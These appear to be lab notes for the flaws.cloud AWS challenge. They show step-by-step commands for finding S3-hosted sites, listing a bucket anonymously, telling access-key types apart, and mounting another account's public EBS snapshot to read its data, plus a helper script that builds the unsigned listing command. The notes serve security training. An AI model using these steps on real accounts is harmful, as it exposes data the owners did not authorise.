Enumeration

Check whether the domain the IP resolves to contains the word "website" (an S3 static-website endpoint).

You can access the static website at: flaws.cloud.s3-website-us-west-2.amazonaws.com or the bucket at: flaws.cloud.s3-us-west-2.amazonaws.com.

If you try to access a bucket but specify a different region in the domain name (for example, the bucket is in bucket.s3.amazonaws.com but you are trying to access bucket.s3-website-us-west-2.amazonaws.com), you will be redirected to the correct location.

Test to see if a website is hosted in an s3 bucket

dig +nocmd flaws.cloud any +multiline +noall +answer

This returns the IP address the name resolves to.

Put the IP in a browser; it will redirect to the AWS console S3 page.

Run nslookup on the IP to get the AWS S3 website hostname.

Check for common s3 bucket misconfigurations

/bucketflaws.sh -u flaws.cloud -o -p -d

Using the AWS cli

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

This lists the files in the bucket without any credentials (--no-sign-request).

You can also list the files by going to http://flaws.cloud.s3.amazonaws.com/

This works because the bucket grants "Everyone" the "List" permission.
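The dig/nslookup steps above end with an S3 hostname; the helper below (an added example, not code from the original notes or from flaws.cloud) classifies such a hostname, recovers the bucket name and region, and builds the unauthenticated listing command used to check for the "Everyone: List" misconfiguration. It assumes the hostname forms <bucket>.s3-website-<region>.amazonaws.com, <bucket>.s3-<region>.amazonaws.com, <bucket>.s3.<region>.amazonaws.com and the global <bucket>.s3.amazonaws.com (treated as us-east-1).

```shell
#!/bin/sh
# Added example: derive bucket and region from an S3 endpoint hostname such
# as the one nslookup returns for the IP behind flaws.cloud. No network access
# is needed; the demo at the bottom uses hostnames taken from the notes.

# Prints "<kind> <region> <bucket>" where kind is "website" or "bucket" and
# bucket is "-" when the host carries no bucket label, or "none" when the
# host is not an S3 endpoint at all. (Assumed hostname forms: see lead-in.)
s3_endpoint_info() {
    host=$1
    case "$host" in
        *s3-website-*.amazonaws.com)
            kind=website
            region=${host##*s3-website-} ;;      # text after "s3-website-"
        *.s3.amazonaws.com|s3.amazonaws.com)
            kind=bucket
            region=us-east-1 ;;                  # global endpoint, assumed us-east-1
        *s3-*.amazonaws.com)
            kind=bucket
            region=${host##*s3-} ;;              # dash-separated regional form
        *.s3.*.amazonaws.com)
            kind=bucket
            region=${host##*.s3.} ;;             # dot-separated regional form
        *)
            echo none
            return 0 ;;
    esac
    region=${region%.amazonaws.com}              # drop the domain suffix
    bucket=${host%%.s3*}                         # everything before ".s3"
    [ "$bucket" = "$host" ] && bucket=-          # endpoint with no bucket label
    echo "$kind $region $bucket"
}

# Prints the unsigned listing command from the notes for a bucket and region.
s3_list_command() {
    echo "aws s3 ls s3://$1/ --no-sign-request --region $2"
}

# Demo on constructed input: the two flaws.cloud hostnames from the notes, a
# bare regional endpoint as nslookup would return it, and a non-S3 name.
for h in flaws.cloud.s3-website-us-west-2.amazonaws.com \
         flaws.cloud.s3-us-west-2.amazonaws.com \
         s3-website-us-west-2.amazonaws.com example.com; do
    printf '%s -> %s\n' "$h" "$(s3_endpoint_info "$h")"
done
s3_list_command flaws.cloud us-west-2
```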

Different Types of Access Keys

AKIAJ366LIPB4IJKT7SA = long-term access key (note the AKIA prefix)

ASIAJ366LIJGULDN21D = temporary session access key (note the ASIA prefix)

Get Snapshots

AWS allows you to take snapshots of EC2 volumes and RDS databases. Their main purpose is to create backup copies, but users sometimes use snapshots to regain access to their own EC2 instances when they forget passwords.

Look for snapshots that this user has access to (note the SnapshotId). Remember to include --owner-id, otherwise you will get a lot of output that is not relevant:

aws ec2 describe-snapshots --profile flaws3 --owner-id 975426262029 --region us-west-2

Take the SnapshotId from the output and create a volume from it:

aws ec2 create-volume --profile default --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

Then launch an EC2 instance in the same availability zone and attach the volume.

Run lsblk to check that the disk is attached.

Then run sudo mount /dev/xvdf1 /mnt to mount the drive, and browse /mnt to view the snapshot's contents.
